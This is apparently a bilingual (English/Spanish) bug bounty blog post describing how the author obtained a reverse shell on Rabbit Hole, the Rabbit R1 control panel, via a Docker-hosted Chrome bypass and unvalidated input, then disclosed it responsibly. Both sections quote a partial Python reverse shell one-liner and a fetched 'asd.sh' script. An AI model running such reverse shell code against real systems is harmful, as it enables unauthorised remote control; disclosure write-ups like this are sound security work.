Conseguí una reverse shell en Rabbit
["rabbit","bugbounty","hacking"]

-- El post en Español está más abajo --

We're starting the blog with a bang! I've managed to obtain a reverse shell on the Rabbit website, specifically in Rabbit Hole, the control panel for your Rabbit R1.

 

-- What is Rabbit? --

Rabbit Inc. is a company known for its innovations in IA-in-a-box technology, and the Rabbit R1 is its only product, which is becoming quite popular. Rabbit Hole is the control panel that users use to manage their Rabbit R1, allowing them to perform configurations, updates, and much more.

 

-- The Discovery --

My interest in the security of Rabbit Hole arose when I noticed that connecting your accounts connected you to a Docker. I decided to investigate further and found a way to bypass the limitations they had for Chrome, meaning I could do whatever I wanted with that machine.

 

-- How I Obtained the Reverse Shell --

A reverse shell is a technique where the attacker can execute commands on the target system. Here I'll explain the steps I followed to obtain it:

  1. Identifying the Weak Point: I found that the input form in Rabbit Hole did not properly validate the data.
  2. Downloading the Script: The script I used contained a simple "asd.sh" with a Python reverse shell: python3 -c 'import os,pty,socket;s=socket.socket();s.connect(...)'.
  3. Establishing the Connection: I set up my machine to listen on a specific port and executed the script on the target system, thus achieving the connection.

 

-- Reporting the Vulnerability --

After confirming the vulnerability, I wrote a detailed report and sent it to the Rabbit Inc. security team. Special thanks to Domko for his management.

 

-- Final Thoughts --

This discovery highlights the importance of collaboration between security researchers and tech companies. Responsible disclosure allows companies to fix issues before they can be maliciously exploited, thus improving security for everyone.

If you enjoyed this post, you can follow me on Twitter for more content about IT.

 

-- Aquí empieza el post en Español --

 

Empezamos fuerte con el blog, y es que nada más y nada menos he conseguido una reverse shell en la web de Rabbit. Para ser más específicos, en Rabbit Hole, el panel de control de tu Rabbit R1.

 

-- ¿Quién es Rabbit? --

Rabbit Inc. es una empresa conocida por sus innovaciones en tecnología de IA-in-a-box (IA en una caja), y el Rabbit R1 es su único producto, que está ganando bastante popularidad. Rabbit Hole es el panel de control que los usuarios utilizan para gestionar su Rabbit R1, permitiéndoles realizar configuraciones, actualizaciones y mucho más.

 

-- El Descubrimiento --

Mi interés en la seguridad de Rabbit Hole surgió al notar que, al conectar tus cuentas, se te conectaba a un container de Docker. Decidí investigar más a fondo y encontré una forma de saltarme las limitaciones que tenían para el Chrome de ese contenedor, es decir, pude hacer lo que quisiera con esa máquina.

 

-- Cómo Conseguí la Reverse Shell --

Una reverse shell es una técnica donde el atacante consigue ejecutar comandos en el sistema objetivo. Aquí explicaré los pasos que seguí para obtenerla:

  1. Identificación del Punto Débil: Encontré que el formulario de entrada en Rabbit Hole no validaba adecuadamente los datos.
  2. Descargar el Script: El script que utilicé era un "asd.sh" que contenía una reverse shell en Python: python3 -c 'import os,pty,socket;s=socket.socket();s.connect(...)'.
  3. Establecimiento de la Conexión: Configuré mi máquina para escuchar en un puerto específico y ejecuté el script en el sistema objetivo, logrando así la conexión.

 

-- Reportando la Vulnerabilidad --

Después de confirmar la vulnerabilidad, redacté un informe detallado y lo envié al equipo de seguridad de Rabbit Inc. Especial gracias a Domko por su gestión.

 

-- Reflexiones Finales --

Este descubrimiento subraya la importancia de la colaboración entre los investigadores de seguridad y las empresas tecnológicas. La divulgación responsable permite a las empresas solucionar problemas antes de que puedan ser explotados maliciosamente, mejorando así la seguridad para todos.

Si te ha interesado este post, puedes seguirme en Twitter para más contenido sobre informática.